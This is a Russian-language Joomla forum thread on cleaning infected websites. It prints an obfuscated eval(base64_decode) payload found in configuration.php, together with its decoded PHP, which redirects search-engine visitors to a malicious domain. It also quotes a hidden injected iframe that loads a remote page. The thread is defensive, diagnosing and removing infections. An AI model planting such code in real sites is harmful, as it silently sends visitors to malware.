Вирус на сайте - IT-C@FE

  1. Форум
  3. Форум
  5. Joomla
  7. Безопасность сайта на Joomla
  9. Вирус на сайте
×
Masterpro Nivo Slider (06 фев 2023)

Это форк Vinaora Nivo Slider, пришлось переименовать, в силу требования JED. Даже старую версию качать можно было только с варезных сайтов, нашпигованную троянами. Зачем оно такое, согласитесь.

Важно Вирус на сайте

Подробнее
13 года 4 нед. назад - 13 года 2 нед. назад #1 от Aleksej
Aleksej создал тему: Вирус на сайте
Внимание, угроза!

Некоторое время назад один из сайтов перестал открываться... вернее, его открытие в Mozilla Firefox предваряла грозная надпись:

Занесен ли сайт xxxxxxx в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта несколько раз (1) за последние 90 дней была замечена подозрительная активность.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (2) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 2. Последний раз сайт просматривался Google 2010-10-22, а подозрительное содержание было обнаружено 2010-10-22.

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая freexxpote.co.cc/.

This site was hosted on 1 network(s) including AS12695 (DINET).


При ближайшем рассмотрении было обнаружено, что файл configuration.php модифицирован:
<?php
eval(base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg=="));

В качестве лечения:
$ php -r 'echo
base64_decode("JHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mcmVleHhwb3RlLmNvLmNjLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCg==");'

Но - что же это была за абракадабра такая?

Воспользовавшись сервисом Free online base64 encoder and decoder и введя часть кода, находящуюся между кавычек, получаем:
$referer=$_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
        if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){             
                header("Location: http://freexxpote.co.cc/");
                exit();
        }
        }
Последнее редактирование: 13 года 2 нед. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 8 мес. назад #2 от fluffy
fluffy ответил в теме Re: Вирус на сайте
Алексей, приветствую! Очень комфортный у тебя сайт, спасибо за работу!
Жалуюсь на проблему, собственно. Пытаюсь зайти на свой сайт, а НОД пишет, что прерывает соединение из -за угрозы HTML/Iframe.B.Gen вирус. Гугл не помог, что-то свеженькое, вероятно. Сайт этот .
Что делать несчастному чайнику? :(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 8 мес. назад - 11 года 8 мес. назад #3 от Aleksej
Aleksej ответил в теме Re: Вирус на сайте
Привет, пусть несчастный чайник попробует для начала iframe убрать или закомментить; он у тебя где-нить в индексном файле шаблона сидит:
<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe></body>
Последнее редактирование: 11 года 8 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 8 мес. назад #4 от fluffy
fluffy ответил в теме Re: Вирус на сайте
Да Вы волшебник, Сэр! Таки оно...
УРРРЯЯЯ!!!! СПАСИБОООО!!!!!
А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 8 мес. назад - 11 года 8 мес. назад #5 от Aleksej
Aleksej ответил в теме Re: Вирус на сайте

fluffy пишет: А как эта дрянь туда залезает, если не сильно отвлекаю тупыми вопросами? Может, вахтера какого на сайтик пора установить?

В моей практике не было заражения сайта ифреймами, хвала всевышнему... но вот hubbitus говорит, что такое бывает, и нередко. Слушай, а ты уверен, что iframe не присутствовал в шаблоне сайта изначально? взгляни в старой резервной копии.

А вот что я видел неоднократно, так это заражение сайта злонамеренным программным кодом - виной чему ошибки админов, грамотно не расставивших файлам/каталогам необходимый и достаточный минимум permissions. В качестве несложного примера; если файлу configuration.php в корне сайта свойственно 0777 - то это спустя очень непродолжительное время гарантированное заражение сайта; если не ифреймом, так другой какой завернутой в base64_decode гадостью.

Спроси у поддержки хостинга, какие права на файлы/каталоги требует их апач, и взгляни, как там в реальности они у тебя расставлены. Всякое бывает. Можешь просто, зайдя по ssh, воспользоваться вот этим скриптом, дабы модифицировать разрешения:
find public_html -type d -exec chmod 0755 {} \;
find public_html -type f -exec chmod 0644 {} \;
Соответственно, 0755 и 0644 исправь на другие, если не подойдут. Или оставь так.

Вторая часто встречающаяся причина проблем с сайтами - виндовые файл-менеджеры, хранящие ftp-пароли в открытом виде. Плюс отсутствие хорошего антивируса на локальном рабочем компьютере. Здесь можно посоветовать перейти на использование токенов и сертификатов, отказавшись от паролей вообще..

Думаю, если учесть несложные, в общем, правила it-безопасности в работе с сайтом - всякие-разные "сторожа" без надобности. Конечно, gitignore или subversion неплохо бы освоить при случае.
Последнее редактирование: 11 года 8 мес. назад пользователем Aleksej.
Спасибо сказали: fluffy

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 7 мес. назад #6 от Masha
Masha ответил в теме Re: Вирус на сайте
Помогите мне аааааа :( :( у меня на соей сайте о сериале Ходячих выходит Gen вирус :( у меня антивирус уже красный стал :( помоги мне его убрать аааааа :(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 7 мес. назад #7 от serge
serge ответил в теме Re: Вирус на сайте

Masha пишет: у меня на соей сайте о сериале Ходячих выходит Gen вирус у меня антивирус уже красный стал

Попробуйте вот эти скрипты . Все ведь давно для вас выложено.
А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 7 мес. назад #8 от Masha
Masha ответил в теме Re: Вирус на сайте
а его искать в шаблоне?( index.php?(

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 7 мес. назад #9 от serge
serge ответил в теме Re: Вирус на сайте
Существует немало способов помочь в вашей беде. Начните с самого простого - скачайте каталог вашего сайта на wp - себе на комп и тщательно просканируйте хорошим антивирусом с актуальной базой. Допустим, Касперским или ДокторомВебом. Удалите все, что антивирь посчитает нужным удалить, затем залейте каталог обратно и обновите движок wp через панель управления.

Либо у себя на локалке замените удаленные антивирусом файлы аналогами из распакованного архива движка wordpress(скачайте c оф. сайта).

Само собой разумеется, что перед тем, как что-либо делать - совершенно необходимо создать резеврную копию вашего сайта (дерево каталогов + база данных). Приступать к очистке, не имея под рукой актуального бэкапа - очень не рекомендуется.

Также вам в помощь бесплатные сервисы проверки сайтов на вирусы от компаний taghosting.ru и drweb.com.
А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Подробнее
11 года 7 мес. назад #10 от Masha
Masha ответил в теме Re: Вирус на сайте
как же тяжело :ohmy:

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

  1. Форум
  3. Форум
  5. Joomla
  7. Безопасность сайта на Joomla
  9. Вирус на сайте

Работает на Kunena форум